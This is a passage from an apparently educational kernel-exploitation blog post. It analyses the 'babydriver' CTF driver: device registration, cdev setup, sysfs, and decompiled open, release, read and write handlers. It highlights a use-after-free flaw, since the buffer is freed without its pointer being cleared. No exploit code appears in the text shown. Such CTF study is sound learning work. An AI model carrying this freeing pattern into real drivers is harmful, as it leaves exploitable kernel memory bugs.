minor number)</span></span><br><span class="line"><span class="comment"> * in @dev.  
Returns zero or a negative error code.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">alloc_chrdev_region</span><span class="params">(<span class="type">dev_t</span> *dev, <span class="type">unsigned</span> baseminor, <span class="type">unsigned</span> count,</span></span></span><br><span class="line"><span class="params"><span class="function">      <span class="type">const</span> <span class="type">char</span> *name)</span></span></span><br></pre></td></tr></table></figure><p>Given the call made in this driver:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">alloc_chrdev_region</span>(&amp;babydev_no, <span class="number">0</span>, <span class="number">1</span>, <span class="string">&quot;babydev&quot;</span>);</span><br></pre></td></tr></table></figure><p>we can see that babydriver_init asks the kernel to dynamically allocate a new <strong>major number</strong> for a <strong>character device</strong>, with a single minor number starting at 0 and the name <code>babydev</code>, and stores the resulting device number in the global variable babydev_no.</p><blockquote><p>There is also a function named <code>register_chrdev_region</code>. Its caller must supply the <strong>starting device number (major and first minor)</strong>, and the kernel registers the range beginning at that value. It is similar to <code>alloc_chrdev_region</code>, except that the major number is chosen by the caller rather than by the kernel.</p></blockquote><p>Once the device number is allocated, it has to be connected to the driver's internal functions that implement the device operations.</p><h6 id="1-3-注册字符设备">1.3) Registering the character device</h6><p>The kernel represents a character device with a structure of type <code>cdev</code>, so before the device can be used, the driver must <strong>initialize</strong> and <strong>register</strong> one such structure.</p><blockquote><p>Note that a driver may allocate more than one device number and create more than one device.</p></blockquote><p>babydriver_init performs the initialization with:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cdev_init</span>(&amp;cdev_0, &amp;fops);</span><br></pre></td></tr></table></figure><p>The initialization function for the cdev structure is declared as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * cdev_init() - initialize a cdev structure</span></span><br><span class="line"><span class="comment"> * @cdev: the structure to initialize</span></span><br><span class="line"><span class="comment"> * @fops: the file_operations for this device</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Initializes @cdev, remembering @fops, making it ready to add to the</span></span><br><span class="line"><span class="comment"> * system with cdev_add().</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">cdev_init</span><span class="params">(<span class="keyword">struct</span> cdev *cdev, <span class="type">const</span> <span class="keyword">struct</span> file_operations *fops)</span></span></span><br></pre></td></tr></table></figure><p>As the comment says, the <code>struct cdev</code> that the cdev pointer refers to is initialized, and the <strong>device's operations are set</strong> to the <code>file_operations</code> structure pointer passed in.</p><p>The <code>file_operations</code> structure contains a large number of function pointers:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">file_operations</span> &#123;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">module</span> *owner;</span><br><span class="line">  <span class="built_in">loff_t</span> (*llseek) (<span class="keyword">struct</span> file *, <span class="type">loff_t</span>, <span class="type">int</span>);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*read) (<span class="keyword">struct</span> file *, <span class="type">char</span> __user *, <span class="type">size_t</span>, <span class="type">loff_t</span> *);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*write) (<span class="keyword">struct</span> file *, <span class="type">const</span> <span class="type">char</span> __user *, <span class="type">size_t</span>, <span class="type">loff_t</span> *);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*read_iter) (<span class="keyword">struct</span> kiocb *, <span class="keyword">struct</span> iov_iter *);</span><br><span class="line">  <span 
class="built_in">ssize_t</span> (*write_iter) (<span class="keyword">struct</span> kiocb *, <span class="keyword">struct</span> iov_iter *);</span><br><span class="line">  <span class="built_in">int</span> (*iopoll)(<span class="keyword">struct</span> kiocb *kiocb, <span class="type">bool</span> spin);</span><br><span class="line">  <span class="built_in">int</span> (*iterate) (<span class="keyword">struct</span> file *, <span class="keyword">struct</span> dir_context *);</span><br><span class="line">  <span class="built_in">int</span> (*iterate_shared) (<span class="keyword">struct</span> file *, <span class="keyword">struct</span> dir_context *);</span><br><span class="line">  <span class="type">__poll_t</span> (*poll) (<span class="keyword">struct</span> file *, <span class="keyword">struct</span> poll_table_struct *);</span><br><span class="line">  <span class="built_in">long</span> (*unlocked_ioctl) (<span class="keyword">struct</span> file *, <span class="type">unsigned</span> <span class="type">int</span>, <span class="type">unsigned</span> <span class="type">long</span>);</span><br><span class="line">  <span class="built_in">long</span> (*compat_ioctl) (<span class="keyword">struct</span> file *, <span class="type">unsigned</span> <span class="type">int</span>, <span class="type">unsigned</span> <span class="type">long</span>);</span><br><span class="line">  <span class="built_in">int</span> (*mmap) (<span class="keyword">struct</span> file *, <span class="keyword">struct</span> vm_area_struct *);</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> mmap_supported_flags;</span><br><span class="line">  <span class="built_in">int</span> (*open) (<span class="keyword">struct</span> inode *, <span class="keyword">struct</span> file *);</span><br><span class="line">  <span class="built_in">int</span> (*flush) (<span class="keyword">struct</span> file *, <span class="type">fl_owner_t</span> id);</span><br><span 
class="line">  <span class="built_in">int</span> (*release) (<span class="keyword">struct</span> inode *, <span class="keyword">struct</span> file *);</span><br><span class="line">  <span class="built_in">int</span> (*fsync) (<span class="keyword">struct</span> file *, <span class="type">loff_t</span>, <span class="type">loff_t</span>, <span class="type">int</span> datasync);</span><br><span class="line">  <span class="built_in">int</span> (*fasync) (<span class="type">int</span>, <span class="keyword">struct</span> file *, <span class="type">int</span>);</span><br><span class="line">  <span class="built_in">int</span> (*lock) (<span class="keyword">struct</span> file *, <span class="type">int</span>, <span class="keyword">struct</span> file_lock *);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*sendpage) (<span class="keyword">struct</span> file *, <span class="keyword">struct</span> page *, <span class="type">int</span>, <span class="type">size_t</span>, <span class="type">loff_t</span> *, <span class="type">int</span>);</span><br><span class="line">  <span class="function"><span class="type">unsigned</span> <span class="title">long</span> <span class="params">(*get_unmapped_area)</span><span class="params">(<span class="keyword">struct</span> file *, <span class="type">unsigned</span> <span class="type">long</span>, <span class="type">unsigned</span> <span class="type">long</span>, <span class="type">unsigned</span> <span class="type">long</span>, <span class="type">unsigned</span> <span class="type">long</span>)</span></span>;</span><br><span class="line">  <span class="built_in">int</span> (*check_flags)(<span class="type">int</span>);</span><br><span class="line">  <span class="built_in">int</span> (*flock) (<span class="keyword">struct</span> file *, <span class="type">int</span>, <span class="keyword">struct</span> file_lock *);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*splice_write)(<span 
class="keyword">struct</span> pipe_inode_info *, <span class="keyword">struct</span> file *, <span class="type">loff_t</span> *, <span class="type">size_t</span>, <span class="type">unsigned</span> <span class="type">int</span>);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*splice_read)(<span class="keyword">struct</span> file *, <span class="type">loff_t</span> *, <span class="keyword">struct</span> pipe_inode_info *, <span class="type">size_t</span>, <span class="type">unsigned</span> <span class="type">int</span>);</span><br><span class="line">  <span class="built_in">int</span> (*setlease)(<span class="keyword">struct</span> file *, <span class="type">long</span>, <span class="keyword">struct</span> file_lock **, <span class="type">void</span> **);</span><br><span class="line">  <span class="built_in">long</span> (*fallocate)(<span class="keyword">struct</span> file *file, <span class="type">int</span> mode, <span class="type">loff_t</span> offset,</span><br><span class="line">        <span class="type">loff_t</span> len);</span><br><span class="line">  <span class="built_in">void</span> (*show_fdinfo)(<span class="keyword">struct</span> seq_file *m, <span class="keyword">struct</span> file *f);</span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> CONFIG_MMU</span></span><br><span class="line">  <span class="built_in">unsigned</span> (*mmap_capabilities)(<span class="keyword">struct</span> file *);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="built_in">ssize_t</span> (*copy_file_range)(<span class="keyword">struct</span> file *, <span class="type">loff_t</span>, <span class="keyword">struct</span> file *,</span><br><span class="line">      <span class="type">loff_t</span>, <span class="type">size_t</span>, <span class="type">unsigned</span> <span class="type">int</span>);</span><br><span class="line">  <span 
class="built_in">loff_t</span> (*remap_file_range)(<span class="keyword">struct</span> file *file_in, <span class="type">loff_t</span> pos_in,</span><br><span class="line">           <span class="keyword">struct</span> file *file_out, <span class="type">loff_t</span> pos_out,</span><br><span class="line">           <span class="type">loff_t</span> len, <span class="type">unsigned</span> <span class="type">int</span> remap_flags);</span><br><span class="line">  <span class="built_in">int</span> (*fadvise)(<span class="keyword">struct</span> file *, <span class="type">loff_t</span>, <span class="type">loff_t</span>, <span class="type">int</span>);</span><br><span class="line">&#125; __randomize_layout;</span><br></pre></td></tr></table></figure><p>This challenge uses only a small subset of them, namely <code>/baby(open|release|read|write|ioctl)/</code>.</p><blockquote><p>The owner pointer in struct file_operations must point to the current kernel module; the <code>THIS_MODULE</code> macro yields that pointer.</p></blockquote><p>Once the cdev structure is initialized, the final step is to call <code>cdev_add</code> to tell the kernel the device's device number.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cdev_add</span>(&amp;cdev_0, babydev_no, <span class="number">1</span>);</span><br></pre></td></tr></table></figure><p><code>cdev_add</code> is declared as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * cdev_add() - add a char device to the system</span></span><br><span class="line"><span 
class="comment"> * @p: the cdev structure for the device</span></span><br><span class="line"><span class="comment"> * @dev: the first device number for which this device is responsible</span></span><br><span class="line"><span class="comment"> * @count: the number of consecutive minor numbers corresponding to this</span></span><br><span class="line"><span class="comment"> *         device</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * cdev_add() adds the device represented by @p to the system, making it</span></span><br><span class="line"><span class="comment"> * live immediately.  A negative error code is returned on failure.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">cdev_add</span><span class="params">(<span class="keyword">struct</span> cdev *p, <span class="type">dev_t</span> dev, <span class="type">unsigned</span> count)</span></span></span><br></pre></td></tr></table></figure><p>Note that as soon as <code>cdev_add</code> succeeds, the cdev device is <strong>live</strong> and <strong>its operations can be called by the kernel immediately</strong>. When writing a driver, therefore, call <code>cdev_add</code> last, only after the driver is fully ready to handle operations on the device.</p><h6 id="1-4-将设备注册进-sysfs">1.4) Registering the device in sysfs</h6><p>After the driver module has registered the cdev with the kernel, babydriver_init runs the following code to register the device node in sysfs.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">babydev_class = <span class="built_in">class_create</span>(THIS_MODULE, <span class="string">&quot;babydev&quot;</span>);</span><br><span class="line"><span class="built_in">device_create</span>(babydev_class, <span class="number">0</span>, babydev_no, <span class="number">0</span>, <span class="string">&quot;babydev&quot;</span>);</span><br></pre></td></tr></table></figure><p>The <code>class_create</code> and 
<code>device_create</code> declarations are as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* This is a #define to keep the compiler from merging different</span></span><br><span class="line"><span class="comment"> * instances of the __key variable */</span></span><br><span 
class="line"><span class="meta">#<span class="keyword">define</span> class_create(owner, name)    \</span></span><br><span class="line"><span class="meta">(&#123;            \</span></span><br><span class="line"><span class="meta">  static struct lock_class_key __key;  \</span></span><br><span class="line"><span class="meta">  __class_create(owner, name, &amp;__key);  \</span></span><br><span class="line"><span class="meta">&#125;)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * class_create - create a struct class structure</span></span><br><span class="line"><span class="comment"> * @owner: pointer to the module that is to &quot;own&quot; this struct class</span></span><br><span class="line"><span class="comment"> * @name: pointer to a string for the name of this class.</span></span><br><span class="line"><span class="comment"> * @key: the lock_class_key for this class; used by mutex lock debugging</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * This is used to create a struct class pointer that can then be used</span></span><br><span class="line"><span class="comment"> * in calls to device_create().</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Returns &amp;struct class pointer on success, or ERR_PTR() on error.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Note, the pointer created here is to be destroyed when finished by</span></span><br><span class="line"><span class="comment"> * making a call to class_destroy().</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">class</span> *__class_create(<span class="keyword">struct</span> 
<span class="keyword">module</span> *owner, <span class="type">const</span> <span class="type">char</span> *name,</span><br><span class="line">           <span class="keyword">struct</span> lock_class_key *key)</span><br><span class="line">    </span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * device_create - creates a device and registers it with sysfs</span></span><br><span class="line"><span class="comment"> * @class: pointer to the struct class that this device should be registered to</span></span><br><span class="line"><span class="comment"> * @parent: pointer to the parent struct device of this new device, if any</span></span><br><span class="line"><span class="comment"> * @devt: the dev_t for the char device to be added</span></span><br><span class="line"><span class="comment"> * @drvdata: the data to be added to the device for callbacks</span></span><br><span class="line"><span class="comment"> * @fmt: string for the device&#x27;s name</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * This function can be used by char device classes.  
A struct device</span></span><br><span class="line"><span class="comment"> * will be created in sysfs, registered to the specified class.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * A &quot;dev&quot; file will be created, showing the dev_t for the device, if</span></span><br><span class="line"><span class="comment"> * the dev_t is not 0,0.</span></span><br><span class="line"><span class="comment"> * If a pointer to a parent struct device is passed in, the newly created</span></span><br><span class="line"><span class="comment"> * struct device will be a child of that device in sysfs.</span></span><br><span class="line"><span class="comment"> * The pointer to the struct device will be returned from the call.</span></span><br><span class="line"><span class="comment"> * Any further sysfs files that might be required can be created using this</span></span><br><span class="line"><span class="comment"> * pointer.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Returns &amp;struct device pointer on success, or ERR_PTR() on error.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Note: the struct class passed to this function must have previously</span></span><br><span class="line"><span class="comment"> * been created with a call to class_create().</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">device</span> *<span class="built_in">device_create</span>(<span class="keyword">struct</span> <span class="keyword">class</span> *<span class="keyword">class</span>, <span class="keyword">struct</span> device *parent,</span><br><span class="line">           <span class="type">dev_t</span> devt, <span class="type">void</span> *drvdata, <span 
class="type">const</span> <span class="type">char</span> *fmt, ...)</span><br></pre></td></tr></table></figure><p>Initially, the init function calls <code>class_create</code> to create a <strong>class</strong> object of type <code>class</code>. Once created, the <strong>class</strong> lives in sysfs and can be found under <code>/sys/class</code>.</p><p>The function then calls <code>device_create</code> to dynamically create a <strong>logical device</strong> and initialize it. It also associates the new device with the <strong>logical class</strong> given by the first argument and adds the device to the Linux kernel's device driver model. As a result, a new logical device directory is created automatically under <code>/sys/devices/virtual</code>, and a device file corresponding to the <strong>logical class</strong> is created under <code>/dev</code>.</p><p>The end result is that the device shows up under <code>/dev</code>.</p><h6 id="1-5-init-函数小结">1.5 Summary of the init function</h6><p>In summary, <code>babydriver_init</code> mainly does the following:</p><ol><li>Requests a free device number from the kernel</li><li>Declares a cdev structure, initializes it, and binds it to the device number</li><li>Creates a new struct class and registers the device for that device number in sysfs</li></ol><h5 id="2-babydriver-exit">2) babydriver_exit</h5><p>Once the init function is understood, the exit function is straightforward: it releases every data structure that init set up.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> __cdecl <span class="title">babydriver_exit</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="built_in">device_destroy</span>(babydev_class, babydev_no);</span><br><span class="line">  <span class="built_in">class_destroy</span>(babydev_class);</span><br><span class="line">  <span class="built_in">cdev_del</span>(&amp;cdev_0);</span><br><span class="line">  <span class="built_in">unregister_chrdev_region</span>(babydev_no, <span class="number">1LL</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="3-babyopen">3) babyopen</h5><p>The code of this function is as follows:</p><p><img 
src="/2021/10/kernel_pwn_introduction/image-20211004201828178.png" alt="image-20211004201828178"></p><p>The babyopen function sets up a <code>babydev_struct</code> structure in the kernel, which holds a <code>device_buf</code> pointer and a <code>device_buf_len</code> member.</p><p>Note that <code>kmem_cache_alloc_trace</code> allocates memory in much the same way as <code>kmalloc</code>. I suspect that the call seen in the decompiled code is what remains after the compiler inlined and optimized a call to <code>kmalloc</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span 
class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * kmalloc - allocate memory</span></span><br><span class="line"><span class="comment"> * @size: how many bytes of memory are required.</span></span><br><span class="line"><span class="comment"> * @flags: the type of memory to allocate.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * kmalloc is the normal method of allocating memory</span></span><br><span class="line"><span class="comment"> * for objects smaller than page size in the kernel.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The allocated object address is aligned to at least ARCH_KMALLOC_MINALIGN</span></span><br><span class="line"><span class="comment"> * bytes. 
For @size of power of two bytes, the alignment is also guaranteed</span></span><br><span class="line"><span class="comment"> * to be at least to the size.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The @flags argument may be one of the GFP flags defined at</span></span><br><span class="line"><span class="comment"> * include/linux/gfp.h and described at</span></span><br><span class="line"><span class="comment"> * :ref:`Documentation/core-api/mm-api.rst &lt;mm-api-gfp-flags&gt;`</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The recommended usage of the @flags is described at</span></span><br><span class="line"><span class="comment"> * :ref:`Documentation/core-api/memory-allocation.rst &lt;memory_allocation&gt;`</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Below is a brief outline of the most useful GFP flags</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %GFP_KERNEL</span></span><br><span class="line"><span class="comment"> *  Allocate normal kernel ram. May sleep.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %GFP_NOWAIT</span></span><br><span class="line"><span class="comment"> *  Allocation will not sleep.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %GFP_ATOMIC</span></span><br><span class="line"><span class="comment"> *  Allocation will not sleep.  
May use emergency pools.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %GFP_HIGHUSER</span></span><br><span class="line"><span class="comment"> *  Allocate memory from high memory on behalf of user.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Also it is possible to set different flags by OR&#x27;ing</span></span><br><span class="line"><span class="comment"> * in one or more of the following additional @flags:</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %__GFP_HIGH</span></span><br><span class="line"><span class="comment"> *  This allocation has high priority and may use emergency pools.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %__GFP_NOFAIL</span></span><br><span class="line"><span class="comment"> *  Indicate that this allocation is in no way allowed to fail</span></span><br><span class="line"><span class="comment"> *  (think twice before using).</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %__GFP_NORETRY</span></span><br><span class="line"><span class="comment"> *  If memory is not immediately available,</span></span><br><span class="line"><span class="comment"> *  then give up at once.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %__GFP_NOWARN</span></span><br><span class="line"><span class="comment"> *  If allocation fails, don&#x27;t issue any warnings.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %__GFP_RETRY_MAYFAIL</span></span><br><span class="line"><span class="comment"> *  Try really hard to succeed the allocation but 
fail</span></span><br><span class="line"><span class="comment"> *  eventually.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> __always_inline <span class="type">void</span> *<span class="title">kmalloc</span><span class="params">(<span class="type">size_t</span> size, <span class="type">gfp_t</span> flags)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (__builtin_constant_p(size)) &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> CONFIG_SLOB</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> index;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    <span class="keyword">if</span> (size &gt; KMALLOC_MAX_CACHE_SIZE)</span><br><span class="line">      <span class="keyword">return</span> <span class="built_in">kmalloc_large</span>(size, flags);</span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> CONFIG_SLOB</span></span><br><span class="line">    index = <span class="built_in">kmalloc_index</span>(size);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!index)</span><br><span class="line">      <span class="keyword">return</span> ZERO_SIZE_PTR;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">kmem_cache_alloc_trace</span>(</span><br><span class="line">        kmalloc_caches[<span class="built_in">kmalloc_type</span>(flags)][index],</span><br><span class="line">        flags, size);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  &#125;</span><br><span class="line">  <span 
class="keyword">return</span> __kmalloc(size, flags);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="4-babyrelease">4) babyrelease</h5><p>The logic of babyrelease is simple: it just frees babydev_struct.device_buf.</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211004202526936.png" alt="image-20211004202526936"></p><p>Note, however, that although the kernel memory the pointer refers to is freed here, <strong>after the free the function neither sets the <code>device_buf</code> pointer to NULL nor resets <code>device_buf_len</code> to 0</strong>.</p><h5 id="5-babyread">5) babyread</h5><p>IDA's decompilation of babyread contains errors; the following is the version I corrected by hand against the assembly:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">ssize_t</span> __fastcall <span class="title">babyread</span><span class="params">(file *filp, <span class="type">char</span> *buffer, <span class="type">size_t</span> length, <span class="type">loff_t</span> *offset)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  _fentry__(filp, buffer);</span><br><span class="line">  <span class="keyword">if</span> ( !babydev_struct.device_buf )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1LL</span>;</span><br><span class="line">  result = <span class="number">-2LL</span>;</span><br><span class="line">  <span class="keyword">if</span> ( babydev_struct.device_buf_len &gt; length )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">copy_to_user</span>(buffer, 
babydev_struct.device_buf, length);</span><br><span class="line">    result = length;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>After checking that device_buf is not NULL and that device_buf_len is greater than the requested length, babyread copies length bytes from device_buf into the user-space buffer.</p><h5 id="6-babywrite">6) babywrite</h5><p>babywrite works like babyread in the opposite direction: it copies data from the user-space buffer into the kernel-space device_buf, so it is not discussed further here. The corrected decompilation of this function is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">ssize_t</span> __fastcall <span class="title">babywrite</span><span class="params">(file *filp, <span class="type">const</span> <span class="type">char</span> *buffer, <span class="type">size_t</span> length, <span class="type">loff_t</span> *offset)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  _fentry__(filp, buffer);</span><br><span class="line">  <span class="keyword">if</span> ( !babydev_struct.device_buf )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1LL</span>;</span><br><span class="line">  result = <span class="number">-2LL</span>;</span><br><span class="line">  <span class="keyword">if</span> ( babydev_struct.device_buf_len &gt; length )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">copy_from_user</span>(babydev_struct.device_buf, buffer, 
